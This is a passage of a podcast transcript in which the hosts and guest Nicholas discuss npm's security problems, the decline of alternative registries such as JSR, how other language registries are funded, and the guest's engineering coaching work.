Squarespace handles the website part so you can focus on the thing you actually want to build and the content you want to create.
So head to Squarespace.com slash changelog for a free trial.
And when you're ready to launch, use our offer code CHANGELOG to save 10% off your first purchase of a website or domain.
Once again, Squarespace.com slash changelog.
I'm saddened by your report about JSR.
I had high hopes for it.
It seemed like, like you said,
it was off to a good start.
And I wonder what happened there.
Like what?
Why?
But what about vlt?
You mentioned vlt.
That's another one that's been up and coming from long-time, you know, JS ecosystem people, Darcy Clark and friends.
And then backed by a lot of people who have been around the ecosystem forever and have, you know, benefited and had issues with NPM over the years.
Has vlt manifested?
Is it a thing?
Is it still becoming a thing?
Is it a viable option?
Because eventually we can't make GitHub do anything.
And so if they're not going to do anything, we can continue to tell them they should and try to convince them.
But having some other alternative, which I was hoping JSR would become, would be at least somewhere you could put your efforts into and say, let's all do this instead.
And it would be grassroots and it would be a lot of work.
And I understand there's billions of things being downloaded every month off of NPM.
but if the package maintainers had somewhere to point people and say,
you know what,
for new versions of ESLint,
you got to go here,
you know,
put it in your post install script.
This is an old version of ESLint for the new version.
I'm only publishing on this other platform for,
go read my blog for the reasons.
If you can get like the top 100 packages for maintainers to do that,
you could probably make a dent,
but we have to have somewhere to go.
And if JSR is not going to be it,
is vlt the alternative?
What do you know about that one?
Yeah, so vlt, as far as I know, was not in the business of providing a registry.
It was more around tooling around NPM.
Like a new client that does fancier stuff?
Yeah, basically new client does fancier stuff, more secure, etc.
I haven't seen anything notable come out of that.
In fact, again, I'm starting to think this might be me.
I opened, I was trying out one of the vlt tools, and I went and I found a problem and I opened an issue on the GitHub repo.
Again, it just sat there for months, just no response at all until very, very late.
I mean, again, maybe by the end of the year, somebody was like, oh, this is fixed in the latest version.
It's just I don't know what's happening over there.
and it just, I don't think that JavaScript registries are good business, fundamentally.
And I think that NPM Inc. figured that out, and good for them that they were able to get out
and get the registry into a place where it would at least be up and running.
I feel like with JSR basically the same thing happened, where, you know, JSR was being funded primarily through Deno, even though they wanted to make it more of a
community thing.
Like, fundamentally, like, they came up with it.
They were running it.
You know, they had it on their infrastructure.
But, you know, they are a startup.
Like, they need to figure out ways to make money.
And JSR was just a way to spend money.
I mean, it's nice.
It's a nice gift to the ecosystem.
But they still need to figure out a way to make money, to turn a profit, to pay back investors.
So the chances, I think, that JSR is going to grow up into something else is probably pretty
slim.
And like you, I was pretty excited about it.
I think they got a lot of stuff right.
But one of the challenges of, again, like having a competitor to NPM is like, number one,
you can't actually do quote-unquote binaries like ESLint on JSR.
You can't just say like JSR install ESLint and then just run ESLint.
It doesn't work that way.
And then two, any alternative to NPM needs to be compatible with NPM.
Because unless you're able to use all of the packages just on that new registry,
you're going to have to mix and match between NPM and that new registry.
Sure.
And that's also something that JSR just did not get right. If you try to use JSR packages with NPM packages in a package that you want to publish, it just straight up doesn't work,
because we tried to do this
with one of our ESLint packages,
because the nice thing about JSR
is Deno published a bunch of, like, standard-library-type packages on there, and they're really good,
and so we wanted to use one in one of our packages
and it ended up being such a pain that we just copied the source code
from the JSR package into our repo
so we could package it and publish it up onto NPM.
So like that story was just not there at all.
It was okay if you were just building an application
that you were not going to be publishing to NPM,
you're just going to be deploying, like that worked okay.
But then going and publishing that back to NPM just did not work at all.
So we're stuck.
Yeah.
I don't know.
I got an idea.
All right.
Let's hear it.
What if, and I know Bun is not a registry, but Bun is very fast, what if, by the sheer weight of Anthropic behind Bun now, they saw this as a blind spot and an opportunity?
They obviously invested in Bun anyways.
I'm not sure of the implications behind it.
There's a lot of speculation, of course.
But with the sheer weight they have with just the weight,
their deep coffers, their money, et cetera,
what if they can recreate what MPM is?
They're already NPM compatible.
What if they could redo, but better,
with maybe AI-native provenance, et cetera,
anomaly detection, take your advice, Nicholas, et cetera.
Like, what if they took it on and they said, you know what, we're going to do this?
Could they sway all the maintainers away from NPM by the sheer weight of who they are right now?
I don't think so.
Okay.
And part of the reason is it seems like a lot of developers are very skeptical of AI companies and providing
data that can be used to train AIs.
Like there's, there was a lot in 2025 of people being like, oh, look at this, like, terms of
service, they've now included that your data can be used to train AIs.
And I feel like if Anthropic were to start a registry, that would be like day one, people
being like, wait a second, am I just feeding Anthropic, like my copyrighted material so it can
continue to train Claude? I think that would be a major barrier to that. I think that's a fair
point. Yeah. What about they just, what about the users? You know, all they need to do is convince
Claude to use their registry and then the rest of us are just riding, you know, we're just riding
Claude's back anyway at this point. Really? Yeah. Well, I think it would be interesting if,
if they started having Claude say like, no, you've got to use the Anthropic official registry.
But I could also imagine, you know, similar upset developers.
User backlash against Claude now.
Yeah, totally.
Yeah.
And also just, you know, from an operational standpoint, I don't know that Anthropic
has the operational experience to be able to keep a high volume registry up and running at this point.
I mean, that's something that, I mean, there were really smart people.
Explain that.
What does it take to do that?
I would be lying if I said I knew exactly.
Okay, so you're speculating.
But, well, no, because I know, like, I knew a bunch of the people who started NPM Inc.
We worked together at Yahoo.
Really, really smart people coming from Yahoo that had really, really good operational systems
and being able to pull people, you know, from that ecosystem in to help build up NPM.
I mean, people forget now, but, like, the NPM registry used to go down a lot in the early days.
And even after they got their funding, like, it took a while before it reached stability.
And there's, you know, a lot of, again, I'm not going to lie and say I know how to keep a registry online myself
because I've always been more of a front-end developer than a back-end developer.
But just, you know, off the top of my head, how many, like, read replicas that you need and where you need them,
what sort of traffic are you getting from publishing and how frequently,
and how do you cache effectively to make sure that CI systems are up to date and also not unstable.
There's a lot that goes into managing the registry.
I would say, you know, it's probably kind of similar to like running YouTube in a way.
Because YouTube, before they got bought by Google, like this was also a problem of just like managing the scale that was going on.
And part of why Google was an ideal destination for YouTube
was they had the infrastructure and the operational knowledge
in order to keep that site up and running,
even with all of the traffic and all the bandwidth that it eats up every day.
And again, if you look at Claude, like,
how frequently does Claude go down
because they run into, like, bandwidth issues?
Like, it still is more frequently than you'd like to admit.
They're getting better,
but like it still happens.
So you're not down with,
you don't think the world will be down with
Anthropic slash Bun registry,
NPM compatible,
anomaly detection,
AI native,
et cetera, et cetera, et cetera.
I don't personally.
I think that for a registry
to have a chance to compete with NPM,
I think it has to come from a company
or a person starting a company that is already trusted by the community.
And that's why I thought JSR had a real shot.
Because coming out of Deno, coming from Ryan Dahl,
already had like a lot of trust in the community
and, you know, always presenting himself as like wanting to do the right thing
for the JavaScript ecosystem,
I thought JSR really had that shot.
And to see it kind of fade away has been really disappointing.
Well, I think JSR was open source and supposed to be...
It is.
Like you said, governed open.
So there's opportunity for somebody else to pick up the mantle and run with it if there's no movement from the Dino team any further.
If we look around all these different package ecosystems, like how do they all do it? Or is NPM at such a scale that it doesn't really matter how RubyGems does it, how Perl continues to do it? I know Perl has, like, CPAN, which is mirrored around the world on different servers.
Rust, I think, is the Rust Foundation,
but it's like way smaller in terms of how many crates there are
compared to NPM packages. Java, I think, isn't Maven run by, like, a single entity that sells commercial services?
Is it all just that the scale isn't the same, so it doesn't really matter how they're doing it successfully? Or what are your thoughts on that?
Yeah, I think that's exactly it.
I think it's a scaling problem
because there are package managers around
before NPM existed.
And, you know, RubyGems. So, crates.io came around
afterwards and was kind of inspired by NPM,
but, like, they don't have anywhere near the scale.
No, but what about PyPI, for instance? Like, Python has huge scale.
Yeah, I don't know that much about the Python ecosystem.
I mean, there's the Python Science Foundation.
Python what foundation?
Yeah, it seems to me these other languages usually follow a predictable pattern of,
at some point, some developer was like, we need a package manager.
They made one.
People started using it.
They started a foundation or nonprofit or something that just kind of gets donations to keep it up and running.
And I think that that's where the JavaScript story kind of went sideways
of, like, it was started as a side project by Isaac Schlueter.
And trying to find a home for that, he started NPM Inc, a for-profit business.
And I think that that was probably the point at which
the divergence from other languages hurt the long-term plan for the registry.
Because again, once you become a startup, you take VC, you're on the hook for making money,
you're figuring out how.
And then if you can't figure out how, they want you to sell to try to get as much money back as possible. Like, maybe in some ideal world,
the NPM registry would have ended up, instead of at a for-profit company, in, you know, at the time, the jQuery Foundation, which went on to become the OpenJS Foundation.
Right.
I think in an ideal world that is probably what would have happened, although, I don't know, you know, ESLint is part of the OpenJS Foundation.
So I do have some insight into how the foundation works.
And I also don't know how the foundation would have been able to afford to keep the registry running.
Probably the same way any foundation does: just donations. They'd have to just beat the
streets for bigger donations from funded companies that really want JavaScript to win, like Google,
for instance. When the web wins, Google wins, at least historically. Yep. And so they would be probably
a sponsor. And it would just be like, let's just break even and continue to break even and pay these
bandwidth and costs and AWS costs or whatever it takes to run the thing. And that's how they're all
running, but, like you said, the scale is bigger here.
I did confirm Python Software Foundation.
I'm not sure what I was talking about with Python Science Foundation.
The PSF has oversight and donations.
Sponsorships: AWS, Google, Datadog provide $10,000. Fastly provides $10,000 per month in hosting. That's just me reading this from an LLM lookup.
So fact check that, but it makes sense.
That's the way it's working.
It probably doesn't always work great.
I'm sure there's push and pull on the direction and there's quite drama around all the things.
But, like, that's kind of how community-run, important things are maintained and continued.
But they don't have the profit motive behind them.
And so I think you're right on track there with, like, turning it into a business. That was probably a long-term death sentence.
And here we are.
And had it gone to the OpenJS Foundation versus to GitHub, perhaps that would have killed it off for good, or perhaps it would have given it a better chance. I don't know. Obviously we can't do the parallel histories, but it seems like it's in an okay place. It continues to exist. It operates pretty well. But it's so important
now that the stakes have been, you know, ratcheted up on the security side. And there are more
things that need to be done. And there's really not much of an incentive besides, like you said,
some pending nuclear moment of terrible press and, like, user backlash
and all these things, a huge security breach, perhaps legal action,
that would actually motivate them to really go after it.
Or just the cool factor, man, just the cool factor of implementing anomaly detection
and, like, these verified users. That would be, that'd be a fun job, you know, to save it.
Potentially. I mean, it's not a save, because, I mean, you're going to keep using it,
but you're going to be using it begrudgingly.
You're not exactly thrilled that NPM is not as secure as it should be.
Scared? Yeah. It's all you've got; it's your only option. Like, the road there is paved with potholes and
thieves and, you know, people with weapons and stuff trying to take me out. It's like, that's not a good
road. That's an exaggeration, of course, but, you know, you've only got the one road to go down and not much
choice. And even if there was a choice, based on what you've said, Nicholas, even with that choice
there might not be a mass exodus away from NPM to something else just because of it.
It's gravity.
I mean, the packages behind NPM, if this math is correct, as of late 2025: 3.1 million packages.
This is according to Wikipedia.
So blame Wikipedia if that's wrong.
I mean, that's a lot of packages.
That's a lot of people to move.
I mean, you don't want to swap out your just-in-time credentials, let alone move to something else with maybe different tooling, maybe better tooling.
Who knows?
Yeah, they have to have a good reason.
Yeah. And security rarely moves people very fast or far.
It might move this community, though.
I mean, if there's a lot of fear and uncertainty because of security in particular.
It seems like the profit incentive could be there, though.
And when you see companies like vlt and companies like Socket springing up basically because of these problems.
Right.
It seems like there's some possibility there of GitHub just saying, like, look, there are companies that are willing to pay for these types of services.
Like, maybe we can offer those services and use that to offset some of the cost of implementing these changes on NPM to say, hey, if you want the fastest notification of potential security threats or what have you,
you sign up for the service,
we're going to use that money,
funnel it into the NPM team,
and start funding it that way.
I feel like there's a lack of creativity
in the solutions at this point.
Because there's a whole world of possibilities out there
to be able to turn NPM from just like a cost sink
into something that could maybe break even
or maybe, maybe,
at least just not be the albatross that you're dealing with constantly.
Like, I think it's wishful thinking at this point that GitHub would willingly spin off NPM
into a foundation. I mean, they could certainly do it.
Like, it wouldn't hurt them financially to just say, hey, you know what?
We want to start a foundation or give it to the OpenJS Foundation.
As part of that, we've come to an agreement with, you know, Google and Meta and whoever
else that we're going to jointly fund registry operations by donations to the OpenJS
Foundation.
The OpenJS Foundation will be in charge of hiring engineers to work on it based on that.
Maybe that's an off-ramp for them.
I don't know if they'd be open to that.
But there's just, there's a lot more options out there than I think are being discussed
or even considered at this point.
For sure, for sure. Let me take this as an opportunity to invite anybody who has insight into the underpinnings, the behind-the-scenes of NPM: open invite. Come on, let's talk about whatever you want to talk about. Let's even spitball some ideas live here on the podcast. Maybe we even spin up a Claude Code session and whip up a new feature for you. Who knows? What I'm trying to say is, we'll get some action here. I'm going to say get Nicholas hired on there to come in and right the ship, you know? Bring him in.
He's got good ideas.
Would you do that, Nicholas?
Hey, happy to.
If I can help.
There you go.
I'm out here willing to help.
Yeah, what does your day-to-day look like?
What are you up to?
Well, I'm at the moment an independent software engineer.
So I just take on contracting, consulting work.
I work on ESLint as I'm able.
And I do coaching for software engineers,
just helping people
when they kind of reach those
upper levels of the IC track,
tech lead, staff engineer, principal
engineer, which I did
in a former life,
just helping people kind of navigate
companies and leadership
and communication and politics
and all the things.
Is that one-on-one? Is it a small group?
How does that work out?
Yeah, it's one-on-one.
Just do remote Zoom calls,
and yeah, just talk about the challenges people are having
and give some tools and suggestions
of how to deal with situations that might come up
because anybody who's become a tech lead
will know that basically when you become a tech lead,
they say, hey, congratulations, you're a tech lead,
go do tech leading stuff,
and don't really tell you what that entails.
So that's when I come in and just help people figure
out how to work effectively in those roles and, you know, manage your manager and get stuff done.
How likely is it that that person is already employed and a tech lead? And they're just like, hey,
now that I've got this role, can I use some discretionary spending for some leveling up?
Yeah, 100% of the people that I work with are people who are already employed at a company.
A lot of times a company will even pay for the coaching through their professional development
expensing. And, you know, sometimes the managers reach out to me and just say, hey, I have this
person that I'm working with that I'd really like to get some coaching, either because
they just don't have more senior people at the company. Like I work with a lot of startups
that just don't have those really senior people that can help mentor people. Or sometimes
the really senior people are just too busy, don't actually have the time to sit down and
do that sort of coaching and mentoring.
Sometimes it's the engineers themselves who reach out.
And I always encourage them to talk to the manager to see if they have professional
development funding that might be able to pay for it too, because if the company is going
to benefit from you becoming a better employee, then it seems only fair that they should
pay for it, too.
Well, how can they reach out to you?
What's the best way to say, hey, Nicholas, I need some help.
Yep.
So you can drop by my website.
It's at humanwhocodes.com slash coaching.
And that'll give you all the information about what I do, how it works,
and you can see some testimonials.
And there's a button for you to apply and fill out a form that just tells me about you.
And I can figure out if it would be a good fit.
Because I'm one of those people who I want to make sure I can help you with the situation
that you're dealing with.
And if not, then I'll try to help you find somebody who can.
And how should GitHub contact you to come help fix NPM security?
The same way.
Slash coaching, yo.
Pay the bills.
The folks at GitHub, I'm in a Slack with them already, so they can reach out at any time.
A DM near you.
All right, GitHub.
The tables are turned back to you.
Come on the pod.
Let's talk about NPM or reach out to Nicholas, whichever you prefer.
That's your next move.
There you go.
Let's make it happen.
Nicholas, anything else on your mind,
anything else you want to talk about?
It could be on topic, off topic,
regarding what's going on in software world or anything before we let you go.
Yeah, I just wanted to say something about AI.
I don't think it's hype.
I still see people out there saying,
oh, this is just a hype train.
Personally, I have seen like a 10x productivity improvement
in the amount of code that I can now generate versus writing it myself.
And especially when you're, like, jumping around from project to project,
it's saving me a ton of time.
It would otherwise be really difficult for me to be productive writing code for ESLint right now.
But with AI, like, hey, you know, I know what I need to get done
and I can describe it fairly quickly
and just kind of let AI go off and do it.
So if you're one of the stragglers out there
who's still not embracing AI in your day-to-day,
like 2026 is the year.
You've got to start doing it now.
2026 is the year.
There you go.
How about resources for maintainers
who have to maintain NPM modules, packages, whatever?
Do you have any resources for them,
any advice for them?
Maybe they're not paying attention as much as they should
to the details. Where could they go to become leveled up?
Yeah, that is a good question that I don't know I have an answer to.
I'd love to see that resource exist, because I feel like that's just, like, a natural thing, too.
Because, I mean, NPM... I don't even know.
I don't know NPM's docs, but I would imagine the need is there,
but they're already not doing the other things as well as they could.
So let's just do those things better.
Yeah.
But the docs could be by, you know, maintainers out there who've been down the road,
have the bloody knuckles and the scars to prove it,
and the backward-facing desire for everyone else following them,
or following NPM or the ecosystem,
to be leveled up in some way.
I'd love to see that happen.
So if you're out there doing something like that,
or you've got that resource, or that's your next big AI-generated thing.
I mean, that really could be something you can AI-generate over a weekend.
You can invent 100 new docs that were never there with a few prompts
and your new buddy Ralph and Claude just circling around, whatever.
Get it done.
If I'm remembering correctly, I think the OpenJS Foundation might have put out something along
these lines.
Just not 100% sure.
Very cool.
Well, Nicholas, thank you for coming on the pod, sharing your time again with us back here
on the changelog.
And thank you so much for your angst in sharing that.
And just pushing the needle on what could be a secure NPM coming to you sometime soon.
Thanks for having me.
All right, that's your change log interview for this week.
Thanks for riding along with us.
What do you think about NPM?
Is it being neglected?
Is there a way to save it?
Are we being overly dramatic?
Let us know in the comments.
Links in the show notes.
Thanks again to our partners at Fly.io,
to Breakmaster Cylinder for the beats, and to you for listening.
We appreciate you more than you know.
That's it.
This one's done.
But on Friday, come on back.
We're talking Clawdbot slash Moltbot, personal software, and the death of software as a service.
Talk to you then.
